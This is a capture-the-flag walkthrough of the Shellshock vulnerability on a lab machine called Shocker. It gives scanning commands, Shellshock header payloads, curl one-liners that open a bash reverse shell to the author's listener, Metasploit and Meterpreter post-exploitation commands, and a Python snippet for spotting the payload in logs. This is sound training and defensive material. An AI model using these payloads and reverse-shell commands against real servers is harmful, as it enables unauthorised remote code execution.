Burak Dirlik

SHOCKER

Shocker is a machine built around Shellshock (CVE-2014-6271) exploitation. The target IP is 10.129.214.185, so let's start.

nmap -sV -sC -Pn -p- -oN nmapshocker.txt 10.129.214.185

(-sV/-sC for version detection and default scripts, -Pn to skip host discovery, -p- for all TCP ports, -oN to save normal output to nmapshocker.txt; without -oN the file name would be treated as another target.)

Opening the IP address in a browser shows only a funny picture, so we move on to directory fuzzing.

Directory fuzzing

/cgi-bin/	-->	403 Forbidden
/cgi-bin	-->	404 Not Found

The trailing slash matters: Apache maps /cgi-bin/ to the CGI directory (it exists but has no index and no listing, hence 403), while /cgi-bin without the slash does not match that mapping at all. Fuzz with the slash, and treat the 403 as confirmation that the directory is there.

Let’s dig a little deeper into the /cgi-bin/ directory

gobuster dir -u http://10.129.214.185/cgi-bin/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -o gobuster.txt -x sh

(-x sh appends the .sh extension to every word, which is what CGI shell scripts are usually named.)

gobuster finds /cgi-bin/user.sh, a CGI shell script. Time to try Shellshock.

The idea: Apache's mod_cgi hands every request header to the script as an environment variable (User-Agent becomes HTTP_USER_AGENT), and a vulnerable bash treats any variable whose value begins with () { as an exported function definition and executes whatever follows the closing brace. So the content of any header can be set to

() { :; }; echo; /usr/bin/id

The echo emits the blank line that terminates the CGI response headers; without it Apache reports a malformed header and returns a 500 instead of the command output.

A one-liner curl command that verifies the vulnerability (the output of id comes back as the response body):

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'id'" http://10.129.214.185/cgi-bin/user.sh
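As an added example (my own code, not from this writeup, Apache or bash), the following Python models what mod_cgi does with a request like the one above and then applies the same signature to constructed Apache access-log lines. The header-to-variable mapping follows RFC 3875 (HTTP_<NAME>); build_probe_request, cgi_script_env, flag_shellshock_hits and the sample log lines are assumptions for illustration, not real server components.

```python
"""Added example: how a Shellshock payload travels from an HTTP header into
a CGI script's environment, and how to flag it in web logs.

Illustrative code written for this writeup, not part of Apache, bash or the
original post. The header-to-environment mapping follows RFC 3875; the log
lines below are constructed sample data.
"""
import re

# A vulnerable bash (CVE-2014-6271) imports any environment variable whose
# value starts with "() {" as a function definition and then executes the
# commands that follow the closing brace. That prefix is the signature.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")


def is_shellshock_payload(value):
    """True if a header/env value carries the function-definition trick."""
    return SHELLSHOCK_RE.search(value) is not None


def cgi_env_from_headers(headers):
    """mod_cgi style: every request header becomes HTTP_<UPPER_NAME>.
    This is why *any* header (User-Agent, Referer, Cookie...) works."""
    return {"HTTP_" + name.upper().replace("-", "_"): value
            for name, value in headers.items()}


def cgi_script_env(raw_request):
    """Parse a raw HTTP request and return the environment the CGI script
    would see (simplified: header-derived variables plus two request
    fields; a real server sets many more)."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    request_line, *header_lines = head.split("\r\n")
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")   # split on the first colon only
        headers[name.strip()] = value.strip()
    env = cgi_env_from_headers(headers)
    env["REQUEST_METHOD"] = method
    env["SCRIPT_NAME"] = target
    return env


def build_probe_request(host, path, command, header="User-Agent"):
    """Wire form of the curl one-liner above (hypothetical helper). The two
    echo calls emit the blank line that ends the CGI response headers, so
    the command output lands in the HTTP body instead of a 500 error."""
    payload = "() { :; }; echo; echo; /bin/bash -c '%s'" % command
    return ("GET %s HTTP/1.1\r\nHost: %s\r\n%s: %s\r\nConnection: close\r\n\r\n"
            % (path, host, header, payload))


def suspicious_env_vars(env):
    """Names of environment variables that would trigger a vulnerable bash."""
    return sorted(name for name, value in env.items()
                  if is_shellshock_payload(value))


# Detection side: Apache "combined" log format, constructed sample lines.
SAMPLE_LOG = [
    '10.10.14.168 - - [01/Jan/2024:12:00:00 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 55 "-" '
    '"() { :; }; echo; echo; /bin/bash -c \'id\'"',
    '10.10.14.168 - - [01/Jan/2024:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"',
    '10.10.14.168 - - [01/Jan/2024:12:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 55 "-" "curl/8.0"',
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([^"]*)" (\d{3}) \S+ "([^"]*)" "(.*)"$')


def flag_shellshock_hits(lines):
    """Return (source_ip, path) for requests whose User-Agent or Referer
    carries a Shellshock payload. Only those two headers reach the default
    combined log; for other headers you need a custom LogFormat or a WAF."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        src, request, _status, referer, user_agent = m.groups()
        if is_shellshock_payload(user_agent) or is_shellshock_payload(referer):
            hits.append((src, request.split(" ")[1]))
    return hits


if __name__ == "__main__":
    req = build_probe_request("10.129.214.185", "/cgi-bin/user.sh", "id")
    env = cgi_script_env(req)
    print("CGI env vars carrying a payload:", suspicious_env_vars(env))
    print("log hits:", flag_shellshock_hits(SAMPLE_LOG))
```

The same signature is what a patched bash refuses: after the fix it only imports functions from variables named BASH_FUNC_name%%, so an HTTP_USER_AGENT that starts with () { is just a string. On the defensive side, note the limitation in flag_shellshock_hits: a payload in Cookie or Accept never shows up in a default access log, so log-based detection alone is not enough.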

Curl (full request with browser headers; note the target address is 10.129.128.253 in this session and 10.10.14.168 is our listener):

curl -i -s -k -X $'GET' \
    -H $'Host: 10.129.128.253' \
    -H $'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.168/8888 0>&1' \
    -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' \
    -H $'Accept-Language: en-US,en;q=0.5' \
    -H $'Accept-Encoding: gzip, deflate' \
    -H $'Connection: close' \
    -H $'Upgrade-Insecure-Requests: 1' \
    $'http://10.129.128.253/cgi-bin/user.sh'

Netcat (start the listener before sending the request):

nc -nlvp 8888

A simpler reverse shell with curl. There is no need to send every browser header; only the one carrying the payload matters, and curl -A sets the User-Agent directly:

curl -A "() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.168/8888 0>&1" http://10.129.128.253/cgi-bin/user.sh

Privilege escalation

Second way of getting a shell: Metasploit. The module for this bug is exploit/multi/http/apache_mod_cgi_bash_env_exec; set RHOSTS to the target and TARGETURI to /cgi-bin/user.sh and run it to get a Meterpreter session.

One thing to keep in mind: a Meterpreter session is not a normal system shell. It has its own command set, so commands such as id or sudo are not recognized (the Meterpreter counterpart of id is getuid).

Switching from Meterpreter to an interactive system shell with the shell command gives a normal /bin/sh on the target, and from there we did the privilege escalation and got the root flag.

In Meterpreter, the available commands depend on the payload (the Linux Meterpreter used on this box has fewer than the Windows one). Some commonly used commands:

1. Core Commands:
help: Lists all available Meterpreter commands or provides help for a specific command.
background: Backgrounds the current session (return to it with sessions -i <id> in msfconsole).
2. System Commands:
sysinfo: Displays information about the target system, such as OS, architecture, etc.
ps: Lists running processes on the target system.
shell: Opens a system command shell (/bin/sh here) on the target; this is where id, sudo and the rest of the normal Linux toolbox work.
execute -f <program>: Runs a program on the target without leaving Meterpreter.
3. File System Commands:
ls: Lists files and directories on the target system.
cd: Changes the current working directory.
download: Downloads a file from the target system.
upload: Uploads a file to the target system.
4. Networking Commands:
ifconfig (alias ipconfig): Displays network configuration information.
portfwd: Forwards ports through the session.
route: Displays or modifies the session's routing table. Pivoting through the compromised host is done with route add in msfconsole (or post/multi/manage/autoroute); there is no separate pivot command.
5. Privilege Escalation Commands:
getsystem: Attempts to elevate privileges to SYSTEM. Windows only, so it is of no use on this Linux target.
6. Information Gathering Commands:
getuid: Displays the user the Meterpreter process runs as (the Meterpreter equivalent of id).
getpid: Displays the current process ID.
7. Post-Exploitation Commands:
migrate: Moves the Meterpreter into another process.
hashdump: Dumps password hashes. Windows only; on Linux use post/linux/gather/hashdump, which needs root.
8. Scripting and Automation:
resource: Executes Meterpreter commands from a script file.
run <module>: Runs a post module or legacy Meterpreter script (there is no script command).